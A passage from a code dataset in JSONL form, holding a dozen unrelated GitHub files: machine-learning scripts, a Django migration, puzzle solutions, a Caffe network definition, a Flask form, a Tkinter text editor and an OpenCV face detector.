elif t < 0:\r\n b_test[i]['y_'] = -1\r\n else:\r\n b_test[i]['y_'] = 0\r\n\r\n if b_test[i]['y'] != b_test[i]['y_']:\r\n self.accu_test = self.accu_test - 1\r\n print('\\nThe test accuracy is ' + str(self.accu_test / each_test_num / 2))\r\n self.draw_test(a_test, b_test)\r\n\r\n def draw_test(self, a_test, b_test):\r\n '''\r\n 画出测试样本在二维图中的位置\r\n :param a_test:\r\n :param b_test:\r\n :return:\r\n '''\r\n\r\n for a in a_test:\r\n plt.scatter(a['x1'], a['x2'], c = 'red', s = 30, label = 'a', marker = '+')\r\n for b in b_test:\r\n plt.scatter(b['x1'], b['x2'], c = 'blue', s = 30, label = 'b', marker = '+')\r\n\r\n plt.xlabel(\"x1\", fontdict = {'size': 16})\r\n plt.ylabel(\"x2\", fontdict = {'size': 16})\r\n self.end_time = time.time()\r\n print('The usage of the time is ' + str(self.end_time - self.start_time) + 's')\r\n plt.show()\r\n\r\n\r\ndef create_points(each_train_num, each_test_num):\r\n '''\r\n 生成训练和测试用的正态分布点\r\n :return:\r\n '''\r\n\r\n a_train = []\r\n b_train = []\r\n a_test = []\r\n b_test = []\r\n\r\n for i in range(0, each_train_num):\r\n # a组训练样本初始化\r\n a_train.append({})\r\n a_train[i]['x1'] = np.random.normal(loc = 1.0, scale = 1.0)\r\n a_train[i]['x2'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n a_train[i]['bias'] = 1\r\n a_train[i]['y'] = 1\r\n a_train[i]['y_'] = 0\r\n\r\n # b组训练样本初始化\r\n b_train.append({})\r\n b_train[i]['x1'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n b_train[i]['x2'] = np.random.normal(loc = -1.0, scale = 1.0)\r\n b_train[i]['bias'] = 1\r\n b_train[i]['y'] = -1\r\n b_train[i]['y_'] = 0\r\n\r\n for i in range(0, each_test_num):\r\n 
# a组测试样本初始化\r\n a_test.append({})\r\n a_test[i]['x1'] = np.random.normal(loc = 1.0, scale = 1.0)\r\n a_test[i]['x2'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n a_test[i]['bias'] = 1\r\n a_test[i]['y'] = 1\r\n a_test[i]['y_'] = 0\r\n\r\n # b组测试样本初始化\r\n b_test.append({})\r\n b_test[i]['x1'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n b_test[i]['x2'] = np.random.normal(loc = -1.0, scale = 1.0)\r\n b_test[i]['bias'] = 1\r\n b_test[i]['y'] = -1\r\n b_test[i]['y_'] = 0\r\n\r\n return [a_train, b_train, a_test, b_test]\r\n\r\n\r\neach_train_num = 200\r\neach_test_num = 40\r\n[a_train, b_train, a_test, b_test] = create_points(each_train_num, each_test_num)\r\n# demo = LR(a_train, b_train, a_test, b_test, 'gradient descent')\r\na_train = [{'x1': 0.2, 'x2': 0.7, 'bias': 1, 'y': 1, 'y_': 0},\r\n {'x1': 0.3, 'x2': 0.3, 'bias': 1, 'y': 1, 'y_': 0},\r\n {'x1': 0.4, 'x2': 0.5, 'bias': 1, 'y': 1, 'y_': 0},\r\n {'x1': 0.6, 'x2': 0.5, 'bias': 1, 'y': 1, 'y_': 0},\r\n {'x1': 0.1, 'x2': 0.4, 'bias': 1, 'y': 1, 'y_': 0},\r\n ]\r\nb_train = [{'x1': 0.4, 'x2': 0.6, 'bias': 1, 'y': -1, 'y_': 0},\r\n {'x1': 0.6, 'x2': 0.2, 'bias': 1, 'y': -1, 'y_': 0},\r\n {'x1': 0.7, 'x2': 0.4, 'bias': 1, 'y': -1, 'y_': 0},\r\n {'x1': 0.8, 'x2': 0.6, 'bias': 1, 'y': -1, 'y_': 0},\r\n {'x1': 0.7, 'x2': 0.5, 'bias': 1, 'y': -1, 'y_': 0},\r\n ]\r\n\r\ndemo = LR(a_train, b_train, a_test, b_test, 'Linear Regression')\r\n","repo_name":"Liwen-Xiao/Pattern_Recognization_and_Machine_Learning","sub_path":"Linear Regression/Linear regression (parsing_and_iteration).py","file_name":"Linear regression (parsing_and_iteration).py","file_ext":"py","file_size_in_byte":12843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29021580315","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport django.utils.timezone\nfrom django.db import migrations, models\n\nimport model_utils.fields\n\nimport enterprise.models\nimport enterprise.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('enterprise', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='EnterpriseCustomerBrandingConfiguration',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),\n ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),\n ('logo', models.ImageField(validators=[enterprise.validators.validate_image_extension, enterprise.validators.validate_image_size], upload_to=enterprise.models.logo_path, max_length=255, blank=True, help_text='Please add only .PNG files for logo images.', null=True)),\n ('enterprise_customer', models.OneToOneField(to='enterprise.EnterpriseCustomer')),\n ],\n options={\n 'verbose_name': 'Enterprise Customer Branding',\n 'verbose_name_plural': 'Enterprise Customer Brandings',\n },\n ),\n ]\n","repo_name":"luckyjd/lms_edx","sub_path":"edx-ficus.3-3/apps/edx/venvs/edxapp/lib/python2.7/site-packages/enterprise/migrations/0002_enterprisecustomerbrandingconfiguration.py","file_name":"0002_enterprisecustomerbrandingconfiguration.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23545429081","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 09 
03:47:06 2017\r\n\r\n@author: rajbhagat\r\n\r\nFor Code Jam - flipping Pan cakes\r\n\"\"\"\r\n\r\nreadfileopen=open(\"C:/Users/rajbh/Desktop/A-large.in\",'r')\r\nwritefileout=open(\"C:/Users/rajbh/Desktop/A-large.out\",'w')\r\ncaseno=0\r\nfor e in readfileopen:\r\n if caseno>0:\r\n casecount=0\r\n req=e.strip().split(' ')\r\n pancakes=list(req[0])\r\n \r\n sizeno=int(req[1])\r\n pancakeno=0\r\n for pancake in pancakes:\r\n if pancake=='-' and pancakeno<=len(pancakes)-sizeno:\r\n pani=0\r\n while pani (s0, s1), (s1, s2), (s2, s3), ...\"\n a, b = itertools.tee(iterable)\n next(b, None)\n return itertools.zip_longest(a, b)\n\n\n# Copied from https://stackoverflow.com/a/42441759\n@contextlib.contextmanager\ndef working_directory(path):\n \"\"\"Changes working directory and returns to previous on exit.\"\"\"\n prev_cwd = Path.cwd()\n os.chdir(path)\n try:\n yield\n finally:\n os.chdir(prev_cwd)\n\n\n@pytest.mark.parametrize(argnames=\"source_file_input\", argvalues=input_files, ids=idfn)\ndef test_tool(source_file_input, snapshot):\n # We assume initial_cwd to be the build directory\n initial_cwd = Path.cwd().absolute()\n\n source_file_dir = Path(source_file_input).absolute().parent\n\n # Walk up from the source file dir until the directory of this script and\n # gather all the extra args in the extra_args files found along the way\n extra_args_list = []\n extra_args_dir = source_file_dir\n while this_script_dir.parent != extra_args_dir:\n try:\n extra_args = (\n Path(extra_args_dir / \"extra_args\")\n .read_text()\n .replace(\"\\r\\n\", \"\\n\")\n .split(\"\\n\")\n )\n extra_args = list(filter(None, extra_args))\n extra_args = [\n arg.replace(\"${current_dir}\", str(extra_args_dir))\n for arg in extra_args\n ]\n extra_args_list.extend(extra_args)\n print(extra_args_list)\n except FileNotFoundError:\n pass\n extra_args_dir = extra_args_dir.parent\n\n extra_args_map = {\"\": []}\n for extra_arg_line in extra_args_list:\n split = extra_arg_line.split(\":\", 1)\n config = \"\"\n extra_arg = \"\"\n if len(split) == 2:\n config = split[0]\n extra_arg = split[1]\n elif len(split) == 1:\n extra_arg = split[0]\n else:\n assert 0, \"Impossible\"\n\n if config not in extra_args_map:\n extra_args_map[config] = []\n extra_args_map[config].append(extra_arg)\n\n print(extra_args_map)\n for config in extra_args_map:\n infix = \"immortal\"\n extra_args = extra_args_map[\"\"]\n if config != \"\":\n infix = f\"{config}.immortal\"\n extra_args.extend(extra_args_map[config])\n\n out = \"\"\n with working_directory(source_file_dir):\n command = [\n initial_cwd / \"immortalc\",\n source_file_input,\n # Use initial_cwd as build path\n \"-p\",\n initial_cwd,\n \"--stdout\",\n \"--infix\",\n infix,\n \"--force-output\",\n ] + extra_args\n print(command)\n # Call the immortalc from the directory where the source file is.\n out = check_output(command)\n\n # Parse output of immortalc\n file_content_map = {}\n iter = transformed_file_regex.finditer(out.decode(\"utf-8\"))\n for (match, next_match) in pairwise(iter):\n content_start = match.span()[1] + 1\n content_end = next_match.span()[0] if next_match is not None else len(out)\n content = out[content_start:content_end]\n file_content_map[match.group(1)] = content\n\n for file_path, content in file_content_map.items():\n path = Path(file_path)\n # Assert snapshot\n snapshot.snapshot_dir = path.parent.absolute()\n snapshot.assert_match(content, 
path.name)\n","repo_name":"tinysystems/ImmortalThreads","sub_path":"compiler/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"7788361344","text":"from __future__ import print_function\nimport sys\nsys.path.append(\"./python\")\nimport caffe\nfrom caffe.model_libs import *\nfrom google.protobuf import text_format\n\nimport math\nimport os\nimport shutil\nimport stat\nimport subprocess\n\n# Add extra layers on top of a \"base\" network (e.g. VGGNet or ResNet).\ndef AddExtraLayers(net, use_batchnorm=True, arm_source_layers=[], normalizations=[], lr_mult=1):\n use_relu = True\n\n # Add additional convolutional layers.\n # 320/32: 10 x 10\n from_layer = net.keys()[-1]\n\n # 320/64: 5 x 5\n out_layer = \"conv6_1\"\n ConvBNLayer(net, from_layer, out_layer, use_batchnorm, use_relu, 256, 1, 0, 1, lr_mult=lr_mult)\n\n from_layer = out_layer\n out_layer = \"conv6_2\"\n ConvBNLayer(net, from_layer, out_layer, use_batchnorm, use_relu, 512, 3, 1, 2, lr_mult=lr_mult)\n\n arm_source_layers.reverse()\n normalizations.reverse()\n num_p = 6\n for index, layer in enumerate(arm_source_layers):\n out_layer = layer\n if normalizations:\n if normalizations[index] != -1:\n norm_name = \"{}_norm\".format(layer)\n net[norm_name] = L.Normalize(net[layer], scale_filler=dict(type=\"constant\", value=normalizations[index]),\n across_spatial=False, channel_shared=False)\n out_layer = norm_name\n arm_source_layers[index] = norm_name\n from_layer = out_layer\n out_layer = \"TL{}_{}\".format(num_p, 1)\n ConvBNLayer(net, from_layer, out_layer, use_batchnorm, use_relu, 256, 3, 1, 1, lr_mult=lr_mult)\n\n if num_p == 6:\n from_layer = out_layer\n out_layer = \"TL{}_{}\".format(num_p, 2)\n ConvBNLayer(net, from_layer, out_layer, use_batchnorm, use_relu, 256, 3, 1, 1, lr_mult=lr_mult)\n\n from_layer = out_layer\n out_layer = \"P{}\".format(num_p)\n ConvBNLayer(net, from_layer, out_layer, use_batchnorm, use_relu, 256, 3, 1, 1, lr_mult=lr_mult)\n else:\n from_layer = out_layer\n out_layer = \"TL{}_{}\".format(num_p, 2)\n ConvBNLayer(net, from_layer, out_layer, use_batchnorm, False, 256, 3, 1, 1, lr_mult=lr_mult)\n\n from_layer = \"P{}\".format(num_p+1)\n out_layer = \"P{}-up\".format(num_p+1)\n DeconvBNLayerRef(net, from_layer, out_layer, use_batchnorm, False, 256, 2, 0, 2, lr_mult=lr_mult)\n\n from_layer = [\"TL{}_{}\".format(num_p, 2), \"P{}-up\".format(num_p+1)]\n out_layer = \"Elt{}\".format(num_p)\n EltwiseLayer(net, from_layer, out_layer)\n relu_name = '{}_relu'.format(out_layer)\n net[relu_name] = L.ReLU(net[out_layer], in_place=True)\n out_layer = relu_name\n\n from_layer = out_layer\n out_layer = \"P{}\".format(num_p)\n ConvBNLayer(net, from_layer, out_layer, use_batchnorm, use_relu, 256, 3, 1, 1, lr_mult=lr_mult)\n\n num_p = num_p - 1\n\n return net\n\ndef AddExtraTopDownLayers(net, use_batchnorm=True, lr_mult=1):\n # odm_source_layers = ['P3', 'P4', 'P5', 'P6']\n bbox = \"cls_specific_bbox\"\n\n use_relu = True\n # 5 x 5\n # crop feature form bottom-up net\n from_layer = \"P6\"\n out_layer = \"conv6_2_crop\"\n net[out_layer] = L.CropBBox(net[from_layer], net[bbox])\n\n from_layer = out_layer\n out_layer = \"deconv6_2\"\n DeconvBNLayerRef(net, from_layer, out_layer, use_batchnorm, use_relu, 256, 3, 1, 2,\n lr_mult=lr_mult)\n\n from_layer = out_layer\n out_layer = \"deconv6_1\"\n DeconvBNLayerRef(net, from_layer, out_layer, use_batchnorm, use_relu, 1024, 1, 0, 1,\n lr_mult=lr_mult)\n\n 
return net\n\nif __name__ == \"__main__\":\n\n # The database file for training data. Created by data/coco/create_data.sh\n train_data = \"/home/amax/NiuChuang/data/VOCdevkit/VOC0712/lmdb/VOC0712_trainval_lmdb_test2\"\n # The database file for testing data. Created by data/coco/create_data.sh\n test_data = \"examples/coco/coco_minival_lmdb\"\n # Specify the batch sampler.\n resize_width = 320\n resize_height = 320\n resize = \"{}x{}\".format(resize_width, resize_height)\n batch_sampler = [\n {\n 'sampler': {\n },\n 'max_trials': 1,\n 'max_sample': 1,\n },\n {\n 'sampler': {\n 'min_scale': 0.3,\n 'max_scale': 1.0,\n 'min_aspect_ratio': 0.5,\n 'max_aspect_ratio': 2.0,\n },\n 'sample_constraint': {\n 'min_jaccard_overlap': 0.1,\n },\n 'max_trials': 50,\n 'max_sample': 1,\n },\n {\n 'sampler': {\n 'min_scale': 0.3,\n 'max_scale': 1.0,\n 'min_aspect_ratio': 0.5,\n 'max_aspect_ratio': 2.0,\n },\n 'sample_constraint': {\n 'min_jaccard_overlap': 0.3,\n },\n 'max_trials': 50,\n 'max_sample': 1,\n },\n {\n 'sampler': {\n 'min_scale': 0.3,\n 'max_scale': 1.0,\n 'min_aspect_ratio': 0.5,\n 'max_aspect_ratio': 2.0,\n },\n 'sample_constraint': {\n 'min_jaccard_overlap': 0.5,\n },\n 'max_trials': 50,\n 'max_sample': 1,\n },\n {\n 'sampler': {\n 'min_scale': 0.3,\n 'max_scale': 1.0,\n 'min_aspect_ratio': 0.5,\n 'max_aspect_ratio': 2.0,\n },\n 'sample_constraint': {\n 'min_jaccard_overlap': 0.7,\n },\n 'max_trials': 50,\n 'max_sample': 1,\n },\n {\n 'sampler': {\n 'min_scale': 0.3,\n 'max_scale': 1.0,\n 'min_aspect_ratio': 0.5,\n 'max_aspect_ratio': 2.0,\n },\n 'sample_constraint': {\n 'min_jaccard_overlap': 0.9,\n },\n 'max_trials': 50,\n 'max_sample': 1,\n },\n {\n 'sampler': {\n 'min_scale': 0.3,\n 'max_scale': 1.0,\n 'min_aspect_ratio': 0.5,\n 'max_aspect_ratio': 2.0,\n },\n 'sample_constraint': {\n 'max_jaccard_overlap': 1.0,\n },\n 'max_trials': 50,\n 'max_sample': 1,\n },\n ]\n train_transform_param = {\n 'mirror': True,\n 'mean_value': [104, 117, 123],\n 'force_color': True,\n 'resize_param': {\n 'prob': 1,\n 'resize_mode': P.Resize.WARP,\n 'height': resize_height,\n 'width': resize_width,\n 'interp_mode': [\n P.Resize.LINEAR,\n P.Resize.AREA,\n P.Resize.NEAREST,\n P.Resize.CUBIC,\n P.Resize.LANCZOS4,\n ],\n },\n 'distort_param': {\n 'brightness_prob': 0.5,\n 'brightness_delta': 32,\n 'contrast_prob': 0.5,\n 'contrast_lower': 0.5,\n 'contrast_upper': 1.5,\n 'hue_prob': 0.5,\n 'hue_delta': 18,\n 'saturation_prob': 0.5,\n 'saturation_lower': 0.5,\n 'saturation_upper': 1.5,\n 'random_order_prob': 0.0,\n },\n 'expand_param': {\n 'prob': 0.5,\n 'max_expand_ratio': 4.0,\n },\n 'emit_constraint': {\n 'emit_type': caffe_pb2.EmitConstraint.CENTER,\n }\n }\n test_transform_param = {\n 'mean_value': [104, 117, 123],\n 'force_color': True,\n 'resize_param': {\n 'prob': 1,\n 'resize_mode': P.Resize.WARP,\n 'height': resize_height,\n 'width': resize_width,\n 'interp_mode': [P.Resize.LINEAR],\n },\n }\n\n # If true, use batch norm for all newly added layers.\n # Currently only the non batch norm version has been tested.\n use_batchnorm = False\n lr_mult = 0\n\n # Stores LabelMapItem.\n label_map_file = \"data/VOC0712/labelmap_voc.prototxt\"\n\n # parameters for generating priors.\n # minimum dimension of input image\n # min_dim = 320\n # conv4_3 ==> 40 x 40\n # conv5_3 ==> 20 x 20\n # fc7 ==> 10 x 10\n # conv6_2 ==> 5 x 5\n arm_source_layers = ['conv4_3', 'conv5_3', 'fc7', 'conv6_2']\n odm_source_layers = ['P3', 'P4', 'P5', 'P6']\n # L2 normalize conv4_3 and conv5_3.\n normalizations = [10, 8, -1, -1]\n\n # Create 
train net.\n net = caffe.NetSpec()\n\n bbox_seg_data_param = {\n 'label_map_file': label_map_file,\n 'batch_sampler': batch_sampler,\n }\n kwargs = {'include': dict(phase=caffe_pb2.Phase.Value('TRAIN')),\n 'transform_param': train_transform_param}\n\n net.data, net.bbox, net.seg = L.BBoxSegData(name=\"data\", bbox_seg_data_param=bbox_seg_data_param,\n data_param=dict(batch_size=8, backend=P.Data.LMDB, source=train_data),\n ntop=3, **kwargs)\n\n net.cls_specific_bbox, net.binary_mask, net.cls = L.SelectBinary(net.bbox, net.seg, random_select=True, num_class=20, ntop=3)\n net.__setattr__('cls_silence', L.Silence(net.cls, ntop=0))\n\n VGGNetBody(net, from_layer='data', fully_conv=True, reduced=True, dilated=False, dropout=False, pool_mask=True, freeze_all=True)\n\n AddExtraLayers(net, use_batchnorm, arm_source_layers, normalizations, lr_mult=0)\n\n AddExtraTopDownLayers(net, use_batchnorm=True, lr_mult=1)\n\n DeVGGNetBodyRef(net, from_layer='deconv6_1', fully_conv=True, reduced=True, dilated=False,\n dropout=False, pool_mask=True, extra_crop_layers=[])\n\n dekwargs = {'weight_filler': dict(type='xavier'),\n 'bias_filler': dict(type='constant', value=0)}\n deparam = {'param': [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)]}\n net.seg_score = L.Deconvolution(net.derelu1_1, convolution_param=dict(num_output=2, pad=1, kernel_size=3, **dekwargs), **deparam)\n\n net.seg_loss = L.SoftmaxWithLoss(net.seg_score, net.binary_mask, loss_param=dict(ignore_label=255))\n\n with open('examples/ssd/refineNet/vgg16_refnet_seg_voc.prototxt', 'w') as f:\n f.write(str(net.to_proto()))","repo_name":"niuchuangnn/Caffe-TD","sub_path":"examples/ssd/refineNet/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":11523,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43017464832","text":"from flask_wtf import FlaskForm, RecaptchaField\nfrom wtforms import IntegerField, SubmitField, SelectField\nfrom wtforms.validators import DataRequired, NumberRange\n\n\nclass SearchUsersForm(FlaskForm):\n ocupation = SelectField('Ocupación',\n choices=[('other', 'Otro'),\n ('academic/educator', 'Educador/académico'),\n ('artist', 'Artista'),\n ('clerical/admin', 'Clero'),\n ('college/grad student', 'Estudiante universitario'),\n ('customer service', 'Atencion al cliente'),\n ('doctor/health care', 'Doctor/enfermero'),\n ('executive/managerial', 'Ejecutivo'),\n ('farmer', 'Agricultor/ganadero'),\n ('homemaker', 'Ama de casa'),\n ('K-12 student', 'Estudiante K-12'),\n ('lawyer', 'Abogado'),\n ('programmer', 'Programador'),\n ('retired', 'Jubilado'),\n ('sales/marketing', 'Ventas/marketing'),\n ('scientist', 'Científico'),\n ('self-employed', 'Autónomo'),\n ('technician/engineer', 'Técnico/ingeniero'),\n ('tradesman/craftsman', 'Artesano/vendedor'),\n ('unemployed', 'Desempleado'),\n ('writer', 'Escritor')\n ],\n render_kw={\"class\": \"form-control\"})\n\n gender = SelectField('Género',\n choices=[('M', 'M'),\n ('F', 'F')],\n render_kw={\"class\": \"form-control\"})\n\n age = IntegerField(\n 'Edad',\n [\n DataRequired(),\n NumberRange(min=1, max=110)\n ],\n render_kw={\"class\": \"form-control\", \"id\": \"floatingInput\"}\n )\n\n number = IntegerField(\n 'Número de usuarios',\n [\n DataRequired(),\n NumberRange(min=1, max=100)\n ],\n render_kw={\"class\": \"form-control\", \"id\": \"floatingInput\"}\n )\n\n recaptcha = RecaptchaField()\n submit = SubmitField('Buscar',\n render_kw={\"class\": \"btn btn-success 
mt-2\"})\n","repo_name":"sergiogr0702/ProyectoRecomendaciones","sub_path":"forms/SearchUsersForm.py","file_name":"SearchUsersForm.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30526116274","text":"\"\"\"\nYou have a map that marks the location of a treasure island. Some of the map area has jagged rocks and dangerous reefs.\nOther areas are safe to sail in. There are other explorers trying to find the treasure. So you must figure out a\nshortest route to the treasure island.\n\nAssume the map area is a two dimensional grid, represented by a matrix of characters. You must start from the top-left\ncorner of the map and can move one block up, down, left or right at a time. The treasure island is marked as X in a\nblock of the matrix. X will not be at the top-left corner. Any block with dangerous rocks or reefs will be marked as\nD. You must not enter dangerous blocks. You cannot leave the map area. Other areas O are safe to sail in.\nThe top-left corner is always safe. Output the minimum number of steps to get to the treasure.\n\"\"\"\nfrom collections import deque\n\ntreasure_map = [['O', 'O', 'O', 'O'],\n ['D', 'O', 'D', 'O'],\n ['O', 'O', 'O', 'O'],\n ['X', 'D', 'D', 'O']]\n\n##############\nrows = len(treasure_map)\ncols = len(treasure_map[0])\n\n\ndef get_treasure_coords():\n for i, row in enumerate(treasure_map):\n for j, ch in enumerate(row):\n if ch == 'X':\n return j, i\n\n\ndef is_position_valid(position):\n x, y = position\n if x < 0 or x >= cols:\n return False\n if y < 0 or y >= rows:\n return False\n if treasure_map[y][x] == 'D':\n return False\n return True\n\n\nmoving_directions = ((-1, 0), (1, 0), (0, -1), (0, 1))\ntreasure_pos = get_treasure_coords()\n\nvisited_positions = set()\n\nqueue = deque()\nqueue.append((0, 0))\nparents = {}\n\n\ndef bfs(current_pos):\n print(current_pos)\n visited_positions.add(current_pos)\n for direction in moving_directions:\n move_position = (current_pos[0] + direction[0], current_pos[1] + direction[1])\n if move_position == treasure_pos:\n l = deque([current_pos, move_position])\n while current_pos in parents:\n l.appendleft(parents[current_pos])\n current_pos = parents[current_pos]\n return l\n if move_position not in visited_positions and is_position_valid(move_position):\n parents[move_position] = current_pos\n queue.append(move_position)\n\n\nwhile True:\n result = bfs(queue.popleft())\n if result is not None:\n print(result) # deque([(0, 0), (1, 0), (1, 1), (1, 2), (0, 2), (0, 3)])\n break\n if not queue:\n print('Impossible :(')\n break\n","repo_name":"pedrovhb/algoz","sub_path":"traversals/treasure_island.py","file_name":"treasure_island.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30924529485","text":"from repository.base import DailyRepoBase\n\n\nclass CaseReportRepository(DailyRepoBase):\n def __init__(self):\n self.collection = self.db['CaseDaily']\n\n def new_case_per_population(self, countries, from_date):\n r = self.collection.aggregate([\n {\"$match\": {\n \"country\": {\"$in\": countries},\n \"reported_at\": {\"$gte\": from_date}}\n },\n {\"$lookup\": {\n \"from\": \"Countries\",\n \"localField\": \"country\",\n \"foreignField\": \"country\",\n \"as\": \"country_info\"}\n },\n {\"$project\": {\"new_cases\": 1,\n \"reported_at\": 1,\n \"country\": 1,\n \"pop\": {\"$divide\": [{\"$first\": 
\"$country_info.population\"}, self.population_per_million]}}\n },\n {\"$addFields\": {\n \"new_case_per_pop\": {\"$divide\": [\"$new_cases\", \"$pop\"]}}\n },\n {\"$sort\": {\"_id\": -1}}\n ])\n return r\n","repo_name":"miladtavakoli/coronameter","sub_path":"repository/newcase_daily.py","file_name":"newcase_daily.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7435309480","text":"#진법, 구할숫자갯수, 참가인원, 순서\ndef solution(n, t, m, p): \n answer = ''\n \n #현재 숫자\n now = 0\n #변환진수 남은 숫자갯수\n counter = 1\n #순서\n order = p\n \n def change(num, n) :\n numbers = '0123456789ABCDEF'\n result = ''\n if num == 0 :\n return '0'\n while num > 0 :\n result = numbers[num%n] +result\n num = num // n\n \n return result\n \n now_num = '0'\n while t > 0 :\n counter -=1\n order -=1\n \n if order == 0 :\n answer += now_num[len(now_num)-counter-1]\n order = m\n t -=1\n \n if counter == 0 :\n now +=1\n now_num = change(now, n)\n counter = len(now_num)\n \n return answer","repo_name":"jaehyun230/Baekjoon_Algorithm","sub_path":"프로그래머스/lv2/17687. [3차] n진수 게임/[3차] n진수 게임.py","file_name":"[3차] n진수 게임.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74428633155","text":"import polars as pl\nimport declafe.pl.feature_gen as fg\n\n\ndef test_round_n_feature():\n df = pl.DataFrame({\"a\": [1.234, -2.345, 3.456, -4.567, 5.678]})\n round = fg.col(\"a\").round_n(2)\n\n assert round(df).series_equal(\n pl.Series(\n \"round2(a)\",\n [1.23, -2.35, 3.46, -4.57, 5.68],\n ))\n\n abs_round2 = fg.col(\"a\").abs().round_n(2)\n assert abs_round2(df).series_equal(\n pl.Series(\n \"round2(|a|)\",\n [1.23, 2.35, 3.46, 4.57, 5.68],\n ))\n","repo_name":"kazchimo/declafe","sub_path":"tests/pl/feature_gen/unary/test_round_n_feature.py","file_name":"test_round_n_feature.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35401942961","text":"import tkinter as tk\nimport logging\nlogging.basicConfig(level=logging.CRITICAL)\nfrom tkinter import filedialog\n\nclass TextEditor:\n def __init__(self, master):\n self.master = master\n master.title(\"TextEditor\")\n\n self.text = tk.Text(master)\n self.text.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n\n scrollbar = tk.Scrollbar(master)\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\n\n self.text.config(yscrollcommand=scrollbar.set)\n scrollbar.config(command=self.text.yview)\n\n self.open_button = tk.Button(master, text=\"Open\", command=self.open_file)\n self.open_button.pack(side=tk.RIGHT)\n\n self.save_button = tk.Button(master, text=\"Save\", command=self.save)\n self.save_button.pack(side=tk.LEFT)\n\n self.search_label = tk.Label(master, text=\"Search:\")\n self.search_label.pack(side=tk.TOP)\n\n self.search_entry = tk.Entry(master)\n self.search_entry.pack(side=tk.TOP)\n\n self.search_button = tk.Button(master, text=\"Search\", command=self.search)\n self.search_button.pack(side=tk.TOP)\n\n self.replace_label = tk.Label(master, text=\"Replace:\")\n self.replace_label.pack(side=tk.TOP)\n\n self.replace_entry = tk.Entry(master)\n self.replace_entry.pack(side=tk.TOP)\n\n self.replace_button = tk.Button(master, text=\"Replace\", command=self.replace)\n self.replace_button.pack(side=tk.TOP)\n\n self.text.bind(\"\", self.select_all)\n\n def save(self):\n file_path = 
filedialog.asksaveasfilename(defaultextension='.txt')\n with open(file_path, 'w') as file:\n file.write(self.text.get('1.0', tk.END))\n\n def open_file(self):\n file_path = filedialog.askopenfilename()\n if file_path:\n with open(file_path, 'r') as file:\n self.text.delete('1.0', tk.END)\n self.text.insert('1.0', file.read())\n\n def select_all(self, event):\n self.text.tag_add(tk.SEL, '1.0', tk.END)\n return 'break'\n\n def search(self):\n search_string = self.search_entry.get()\n if search_string:\n start = '1.0'\n while True:\n start = self.text.search(search_string, start, tk.END)\n if not start:\n break\n end = f\"{start}+{len(search_string)}c\"\n self.text.tag_add(\"highlight\", start, end)\n start = end\n\n def replace(self):\n search_string = self.search_entry.get()\n replace_string = self.replace_entry.get()\n if search_string and replace_string:\n content = self.text.get('1.0', tk.END)\n new_content = content.replace(search_string, replace_string)\n self.text.delete('1.0', tk.END)\n self.text.insert('1.0', new_content)\n\nroot = tk.Tk()\neditor = TextEditor(root)\nroot.mainloop()\n\n","repo_name":"dmcys/pytextditor","sub_path":"textditor.py","file_name":"textditor.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6555991577","text":"import cv2\nimport sys\nimport os\n\nimages = []\nfor filename in os.listdir(\"pic\"):\n img = cv2.imread(os.path.join(\"pic\",filename))\n if img is not None:\n images.append(img)\n\n# Get user supplied values\n#imagePath = \"pic/IMG-20190603-WA0007.jpg\"\ncascPath = \"haarcascade_frontalface_default.xml\"\n\n# Create the haar cascade\nfaceCascade = cv2.CascadeClassifier(cascPath)\nfor im in images:\n # Read the image\n image = im #cv2.imread(imagePath)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Detect faces in the image\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n flags = cv2.CASCADE_SCALE_IMAGE\n )\n\n #print(\"Found {0} faces!\".format(len(faces)))\n\n # Draw a rectangle around the faces\n for (x, y, w, h) in faces:\n cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n cv2.imshow(\"Faces found\", image)\n cv2.waitKey(0)\n","repo_name":"Abdelrahman-Hanafy/FaceReg","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 